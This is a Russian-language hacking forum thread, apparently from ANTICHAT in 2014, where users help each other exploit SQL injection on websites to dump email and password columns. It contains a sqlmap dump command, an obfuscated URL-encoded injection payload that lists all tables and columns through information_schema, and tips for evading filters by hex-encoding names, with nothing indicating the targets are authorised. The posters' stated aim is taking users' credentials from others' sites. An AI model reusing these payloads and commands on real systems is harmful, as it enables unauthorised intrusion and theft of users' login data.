HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23291  
Старый 14.02.2014, 19:20
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию

Имеем скулю

Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит

http://clip2net.com/s/6P9XZ6

При чем, если дампить отдельно, или mail, или pass то все норм.

Через havij не вариант, он долго думает, особенно при сохранении больших дампов.

Как решить проблему? За ранее спасибо
 
Ответить с цитированием

  #23292  
Старый 14.02.2014, 19:43
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию

OxoTnik

Код:
Code:
python sqlmap.py -u http://site.com/index.php?i=-1 --dump -D db_name -T table_name -C "column1,column2"
 
Ответить с цитированием

  #23293  
Старый 14.02.2014, 19:48
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Так зачем скульмап, если можно одним запросом вывести все таблици и колонки.

В принтабельное поле вставляешь.

(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x )
 
Ответить с цитированием

  #23294  
Старый 14.02.2014, 20:24
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию

Цитата:
Сообщение от erwap  
erwap said:
Имеем скулю
Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит
http://clip2net.com/s/6P9XZ6
При чем, если дампить отдельно, или mail, или pass то все норм.
Через havij не вариант, он долго думает, особенно при сохранении больших дампов.
Как решить проблему? За ранее спасибо
Кажется разобрался, походу эта трабла возникла из-за неравного кол-ва колонок. Задал параметры start=1 и stop= чуть меньше, чем coun column

Главное что бы теперь ничего не перемешалось

А залиться не получается. Нет прав на запись
 
Ответить с цитированием

  #23295  
Старый 14.02.2014, 20:30
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

WebCruiser хорошо дампить, если он скулю раскрутит
 
Ответить с цитированием

  #23296  
Старый 14.02.2014, 22:40
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

подскажите софт чтоб залить бд себе на машину.. пробовал через havij, но это нереально долго.. какие есть предложения?
 
Ответить с цитированием

  #23297  
Старый 14.02.2014, 23:02
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?
И снова здравствуйте. mysqldump, входящий в стандратную поставку mysql-клиента. Если речь о mysql, конечно.
 
Ответить с цитированием

  #23298  
Старый 15.02.2014, 00:43
CoolHucker
Guest
Сообщений: n/a
Провел на форуме:
6813

Репутация: 0
По умолчанию

Добрый вечер

Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!

Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
 
Ответить с цитированием

  #23299  
Старый 15.02.2014, 15:49
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?
sqlmap

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-D dbname -T tablename -C columns --dump
 
Ответить с цитированием

  #23300  
Старый 15.02.2014, 16:47
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

Цитата:
Сообщение от CoolHucker  
CoolHucker said:
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
софт раскручивает самые обычные и самые стандартные скули... Если ручками раскручивать скули не умеешь, то и от софта будет не много толку. Возможно какие-то символы фильтруются.. например имя таблицы.. это исправляется зашифровкой имени таблицы в hex. А вообще так сказать сложно..выложи скулю.. тебе скажут в чем проблема
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ